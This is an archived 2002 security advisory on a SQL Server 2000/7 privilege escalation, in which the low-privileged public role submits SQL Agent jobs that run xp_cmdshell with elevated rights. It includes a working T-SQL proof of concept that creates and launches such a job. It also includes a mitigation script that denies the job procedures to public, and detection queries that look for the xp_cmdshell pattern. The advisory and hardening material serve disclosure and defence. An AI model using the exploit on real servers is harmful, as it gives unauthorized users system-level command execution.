16th Aug 2002 [SBWID-5637]
COMMAND
SQL Server privilege escalation via the helper agent
SYSTEMS AFFECTED
Microsoft SQL Server 2000 and 7
PROBLEM
From David Litchfield's [david@ngssoftware.com] advisory #NISR15002002B:
http://www.ngssoftware.com/advisories/mssql-esppu.txt
With Microsoft SQL Server 2000 and 7 comes a "helper" service, the SQL
Server Agent. The Agent is responsible for restarting the database
service if it stops for some reason, has a role to play in replication
and runs scheduled jobs. As the public role can submit jobs to the SQL
Agent to be executed, a low privileged user may use this to gain control
of the server.
Details
*******
The 'public' role is allowed to create and submit jobs to be executed
by the SQL Agent. To do this one would use a combination of several
stored procedures in the msdb database such as sp_add_job and
sp_add_jobstep, etc. As the SQL Agent is considerably more privileged
than a simple login, often running in the security context of the local
system account, it must ensure that, when a T-SQL job is submitted to
it, it can't be abused. To defend against this it performs a
SETUSER N'guest' WITH NORESET
This effectively drops its high level of privileges so no low
privileged login can submit something like
exec master..xp_cmdshell 'dir'
However, this can be trivially bypassed by causing the SQL Agent to
reconnect after it has dropped its privileges. A low privileged login
can do this using one of the vulnerable extended stored procedures
discussed in the NGSSoftware Alert NISR15002002A
(http://www.ngssoftware.com/advisories/mssql-esppu.txt).
Proof of Concept
****************
-- GetSystemOnSQL
-- For this to work the SQL Agent should be running.
-- Further, you'll need to change SERVER_NAME in
-- sp_add_jobserver to the SQL Server of your choice
--
-- David Litchfield
-- (david@ngssoftware.com)
-- 18th July 2002
USE msdb
EXEC sp_add_job @job_name = 'GetSystemOnSQL', @enabled = 1, @description = 'This will give a low privileged user access to xp_cmdshell', @delete_level = 1
EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL', @step_name = 'Exec my sql', @subsystem = 'TSQL', @command = 'exec master..xp_execresultset N''select ''''exec master..xp_cmdshell "dir > c:\agent-job-results.txt"'''''',N''Master'''
EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL', @server_name = 'SERVER_NAME'
EXEC sp_start_job @job_name = 'GetSystemOnSQL'
SOLUTION
NGSSoftware informed Microsoft of these issues in July. To prevent low
privileged users from submitting jobs one should disallow public access
to the job related stored procedures in the msdb database, particularly
sp_add_job, sp_add_jobstep, sp_add_jobserver and sp_start_job.
Further, Microsoft has released a patch that fixes several extended
stored procedure vulnerabilities that can be used in conjunction with a
job to gain extra privileges.
Please see
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-042.asp
for more details.
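The following T-SQL hardening and audit script is an added example, not part of the original advisory or of NGSSoftware's material. It implements the recommended mitigation (removing public's EXECUTE right on the four job procedures), verifies the result against msdb's system tables, and lists existing jobs owned by non-sysadmin logins whose steps reference xp_cmdshell or xp_execresultset. It assumes SQL Server 2000 system table layout (sysprotects, sysobjects, sysjobs, sysjobsteps); non-sysadmin logins that legitimately schedule jobs will need explicit grants afterwards.

```sql
USE msdb
GO
-- Mitigation: remove the public role's ability to create and launch Agent jobs.
-- DENY rather than REVOKE so a later blanket GRANT to public cannot silently restore it.
DENY EXECUTE ON dbo.sp_add_job       TO public
DENY EXECUTE ON dbo.sp_add_jobstep   TO public
DENY EXECUTE ON dbo.sp_add_jobserver TO public
DENY EXECUTE ON dbo.sp_start_job     TO public
GO
-- Verification: any row still showing GRANT means public can call the procedure.
-- sysprotects.action 224 = EXECUTE; protecttype 206 = DENY, 204/205 = GRANT.
SELECT  o.name AS procedure_name,
        CASE p.protecttype WHEN 206 THEN 'DENY' ELSE 'GRANT' END AS permission_state
FROM    dbo.sysprotects p
JOIN    dbo.sysobjects  o ON o.id = p.id
WHERE   p.uid    = USER_ID('public')
AND     p.action = 224
AND     o.name IN ('sp_add_job', 'sp_add_jobstep', 'sp_add_jobserver', 'sp_start_job')
ORDER BY o.name
GO
-- Detection: jobs owned by non-sysadmin logins whose T-SQL steps try to reach
-- xp_cmdshell or xp_execresultset, the pattern used by the proof of concept above.
SELECT  j.name                 AS job_name,
        SUSER_SNAME(j.owner_sid) AS owner_login,
        s.step_id,
        s.command
FROM    dbo.sysjobs     j
JOIN    dbo.sysjobsteps s ON s.job_id = j.job_id
WHERE   s.subsystem = 'TSQL'
AND     (s.command LIKE '%xp_cmdshell%' OR s.command LIKE '%xp_execresultset%')
AND     ISNULL(IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(j.owner_sid)), 0) = 0
ORDER BY j.name, s.step_id
GO
```

Run the two SELECTs as a sysadmin; the first should return only DENY rows (or nothing) and the second should be empty on a clean server.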